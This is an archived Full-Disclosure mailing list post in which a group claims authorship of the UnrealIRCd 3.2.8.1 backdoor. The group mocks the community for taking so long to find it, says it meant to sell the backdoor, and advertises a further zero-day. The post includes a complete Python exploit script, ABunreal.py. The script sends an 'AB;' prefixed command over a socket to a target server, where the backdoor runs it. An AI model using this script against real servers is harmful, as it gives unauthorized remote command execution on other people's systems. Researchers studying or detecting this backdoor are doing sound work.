Message-ID: <4c150cfc.448ed80a.05b0.55b6@mx.google.com>
Date: Sun, 13 Jun 2010 17:54:21 +0100
From: ac1db1tch3z@...il.com
To: full-disclosure@...ts.grok.org.uk
Subject: Re: UnrealIRCd 3.2.8.1 backdoored on official ftp
 and site: ABunreal.py


It seems as if our backdoor was found so we figured we can't sell this in the ac1db1tch3z 
CANVAS pack (PhosphoricAc1d Exploit pack).

P.S. Since it took months and months for the community to find the system() exploit,
we still have a more complicated zerday unrealircd hack module. Please inquire
when our website is finished.

Brought to you by Ac1dB1tch3z: still using system() like it was 1992AD, 
and still owning everyone with it. Thanks.
------------------------------------------------------------------------

$ stat ABunreal.py 
 File: `ABunreal.py'
 Size: 830           Blocks: 8          IO Block: 4096   regular file
Device: fd02h/64770d    Inode: 16891994    Links: 1
Access: (0777/-rwxrwxrwx)  Uid: ( 1003/      ag)   Gid: ( 1010/      ag)
Access: 2010-04-05 14:26:14.000000000 -0400
Modify: 2009-11-10 00:04:33.000000000 -0500
Change: 2010-04-05 14:26:59.000000000 -0400

------------------------------------------------------------------------

#!/usr/bin/env python
# Ac1db1tch3z 09 

import sys
import socket
import struct

def injectcode(host, port, command):

	host1 = host
	port1 = int(port)
	cmd   = command

	print "!#@#@! Ac1db1tch3z is just Unreal #@...%\n"
	print "- Attacking %s on port %d"%(host1,port1)
	print "- sending command: %s"%cmd

	packet = "AB" +";"+ cmd + ";"+"\n"

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            s.connect((host1, port1))
        except socket.error:
            print "No connection..."
            return 0
        s.sendall(packet)
	blah = s.recv(5000)
	print blah
        s.close()

if __name__ == "__main__":
	if len(sys.argv) == 1:
		print "Usage:", sys.argv[0], "<target host> <target port> <command>"
		print
		sys.exit(1)
	else:
		injectcode(sys.argv[1],sys.argv[2],sys.argv[3])

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
